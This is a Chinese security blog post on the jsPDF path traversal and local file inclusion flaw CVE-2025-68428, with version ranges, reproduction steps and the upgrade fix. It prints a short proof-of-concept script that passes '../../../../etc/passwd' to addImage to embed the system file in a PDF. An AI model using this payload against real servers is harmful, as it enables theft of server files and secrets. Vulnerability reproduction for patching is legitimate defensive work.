文章总结： jsPDF库在Node.js环境下存在本地文件包含漏洞（CVE-2025-68428），攻击者可通过构造恶意路径读取服务器敏感文件。该漏洞影响版本低于4.0.0的dist/jspdf.node.js构建版，建议用户及时更新至4.0.0或更高版本以修复。 综合评分： 90 文章分类： 漏洞分析,WEB安全,应用安全,渗透测试,安全建设

复现与修复指南：jsPDF文件包含漏洞（CVE-2025-68428）

原创

秀逗猫 秀逗猫

秀逗猫

2026年1月9日 00:40 广东

近期，广泛使用的前端PDF生成库jsPDF被曝出一个高危漏洞，编号为CVE-2025-68428。据官方安全公告（GHSA-f8cm-6447-x5h2），该漏洞属于本地文件包含（LFI）和路径遍历（Path Traversal）类型，允许攻击者在特定条件下读取运行jsPDF的服务器上的任意文件，可能导致服务器密钥、配置文件、用户数据等敏感信息泄露。

该漏洞仅影响在Node.js环境中使用的jsPDF版本，浏览器环境中的使用不受影响。具体来说，当应用程序使用版本低于4.0.0的jsPDF Node.js构建版本（dist/jspdf.node.js）时，若用户输入能够控制 addImage、html、addFont 或 loadFile 等方法的第一个参数（文件路径），则会触发此漏洞。

攻击者可以构造恶意的路径（例如 ../../../../etc/passwd），绕过应用程序的目录限制，读取文件系统中的任意文件。jsPDF会将读取到的文件内容原样嵌入到生成的PDF文档中，攻击者随后通过下载该PDF即可窃取敏感数据。

目前jsPDF官方已发布修复方案，建议相关用户及时更新至安全版本以规避潜在风险。

| 受影响版本范围 | 修复版本 | | — | — | | <=3.0.4 | >=4.0.0 |

复现指南

mkdir -p cve-2025-68428 && cd cve-2025-68428
npm install [email protected]
vi p.js

p.js内容如下：

const { jsPDF } = require("jspdf");
const doc = new jsPDF();
doc.addImage("../../../../../../../../etc/passwd", "JPEG", 0, 0, 10, 10);
doc.save("out.pdf");

node p.js
grep root out.pdf
# 获取到 root:x:0:0:root:/root:/bin/bash 即说明漏洞存在
# 直接用pdf阅读器查看pdf也只会看到一个空白pdf

修复指南

更新到4.0.0或以上版本。

更新后，再执行同样的命令就会报错

Error: Trying to read a file from local file system. To enable this feature either run node with the --permission and --allow-fs-read flags or set the jsPDF.allowFsRead property.

这是新版jsPDF新增的安全机制限制。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：秀逗猫 秀逗猫 秀逗猫《复现与修复指南：jsPDF文件包含漏洞（CVE-2025-68428）》